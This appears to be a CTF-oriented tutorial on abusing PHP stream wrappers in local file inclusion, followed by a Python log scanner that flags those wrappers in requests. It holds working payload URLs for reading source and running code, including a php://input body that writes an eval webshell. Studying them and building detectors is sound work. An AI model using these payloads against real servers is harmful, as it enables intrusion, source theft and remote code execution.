PHP pseudo protocol for command execution
2022-07-19 02:37:00 【jjj34】
Reference link: PHP pseudo-protocol summary - SegmentFault
1. file:// protocol
Conditions:
allow_url_fopen: off/on
allow_url_include: off/on
Effect:
Used to access the local file system; in CTFs it is usually used to read local files.
When the parameter of include() / require() / include_once() / require_once() is controllable, the imported file is still parsed as PHP even if it is not a .php file (for example shell.txt). This is how include() behaves.
Explanation:
file:// is the default wrapper used by PHP and exposes the local file system.
Usage:
/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext
Examples:
1. file://[absolute path and file name of the file]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
2. file://[relative path and file name of the file]
http://127.0.0.1/include.php?file=./phpinfo.txt
3. http:// network location and file name
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
2. php:// protocol
Conditions:
allow_url_fopen: off/on
allow_url_include: must be on only for php://input, php://stdin, php://memory and php://temp
Effect:
php:// gives access to the various input/output (I/O) streams; in CTFs, php://filter and php://input are the ones most often used.
php://filter is used to read source code.
php://input is used to execute PHP code.
Explanation:
PHP provides a number of miscellaneous input/output (I/O) streams that give access to PHP's own input and output streams and to the standard input, output and error descriptors.

php://filter usage:
php://filter/read=convert.base64-encode/resource=[file name]
php://input usage:
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php phpinfo(); ?>
Writing a one-line webshell:
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
3. data:// protocol
Effect:
With PHP >= 5.2.0, the data:// stream wrapper can be used to pass data in the corresponding format. It is usually used to execute PHP code.
Usage:
data://text/plain, ???
For example:
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
4. zip:// & bzip:// & zlib:// protocols
Effect:
zip://, bzip:// and zlib:// are all compression streams. They can access a file inside a compressed archive and, more importantly, the archive does not need a particular suffix: it can be renamed to any suffix, such as jpg, png, gif or xxx.
Examples:
1. zip://[absolute path of the compressed file]%23[name of the file inside the compressed file] (# is encoded as %23)
Compress phpinfo.txt into phpinfo.zip, rename the archive to phpinfo.jpg, and upload it.
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
2. compress.bzip2://file.bz2
Compress phpinfo.txt into phpinfo.bz2 and upload it (any suffix is also supported).
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
3. compress.zlib://file.gz
Compress phpinfo.txt into phpinfo.gz and upload it (any suffix is supported).
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
Summary
In CTFs, the most commonly used are data://, php://input, php://filter and file://.
php://input and data:// are used to execute commands.
1. php://input usage
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php phpinfo(); ?>
2. data:// usage
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter and file:// are used to read files.
3. php://filter usage
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php (a PHP file must be base64-encoded before its source can be read out)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4. file:// usage
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
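For the defending side, the summary above maps directly onto a log check. The following Python code is an added example, not part of the original post: it flags access-log requests whose query parameters begin with one of the wrappers listed here and labels each hit with the use this page describes. The log lines, label names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Wrapper prefix -> how this page says it is used (labels are this example's own).
WRAPPER_USE = {
    "php://input": "code-exec",
    "data://": "code-exec",
    "php://filter": "file-read",
    "file://": "file-read",
    "zip://": "archive-include",
    "compress.bzip2://": "archive-include",
    "compress.zlib://": "archive-include",
    "http://": "remote-include",
}
# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [19/Jul/2022:02:37:00 +0000] "GET /include.php?file=./phpinfo.txt HTTP/1.1" 200 512',
    '127.0.0.1 - - [19/Jul/2022:02:37:01 +0000] "POST /include.php?file=php://input HTTP/1.1" 200 90211',
    '127.0.0.1 - - [19/Jul/2022:02:37:02 +0000] "GET /include.php?file=PHP%3A%2F%2Ffilter/read=convert.base64-encode/resource=phpinfo.php HTTP/1.1" 200 120',
    '127.0.0.1 - - [19/Jul/2022:02:37:03 +0000] "GET /include.php?file=zip://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.jpg%23phpinfo.txt HTTP/1.1" 200 90211',
    '127.0.0.1 - - [19/Jul/2022:02:37:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 77',
]


def classify(log_line):
    """Return [(param, wrapper, use)] for query values that begin with a known wrapper."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    hits = []
    # parse_qsl percent-decodes each value once, so %3A%2F%2F becomes ://
    for name, value in parse_qsl(query, keep_blank_values=True):
        lowered = value.strip().lower()  # treat FILE:// and file:// alike
        for prefix, use in WRAPPER_USE.items():
            if lowered.startswith(prefix):
                hits.append((name, prefix, use))
                break
    return hits


def scan(lines):
    """Map line index -> hits, keeping only lines that contain at least one hit."""
    return {i: h for i, line in enumerate(lines) if (h := classify(line))}
```

Values beginning with http:// also occur in benign parameters such as redirect targets, so the remote-include label needs triage before alerting.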